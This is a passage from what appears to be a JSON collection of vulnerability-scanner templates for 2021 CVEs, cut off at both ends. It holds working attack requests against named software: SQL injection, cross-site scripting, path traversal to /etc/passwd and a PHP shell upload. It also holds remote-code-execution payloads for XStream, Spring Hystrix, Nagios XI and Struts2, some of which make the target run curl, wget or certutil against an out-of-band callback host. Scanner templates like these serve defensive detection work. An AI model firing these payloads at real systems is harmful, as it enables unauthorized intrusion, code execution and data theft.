Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-24943","info":{"name":"Registrations for the Events Calendar < 2.7.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nevent_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"Please enter the email you registered with\")"],"condition":"and"}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?m)^-----BEGIN PRIVATE KEY-----"]},{"type":"word","part":"header","words":["application/json","application/html"],"condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-26294","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<AdminLogin>","<AdminPassword>","<DBHost>"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["User-Agent: (curl|CertUtil)"]}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(header,'text/plain')","regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(header,'text/plain')","contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","internal":true,"words":["IBM WebSphere Portal"]}]},{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/car-repair-services/css","/wp-content/themes/car-repair-services/js","id=\"car-repair-services-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat 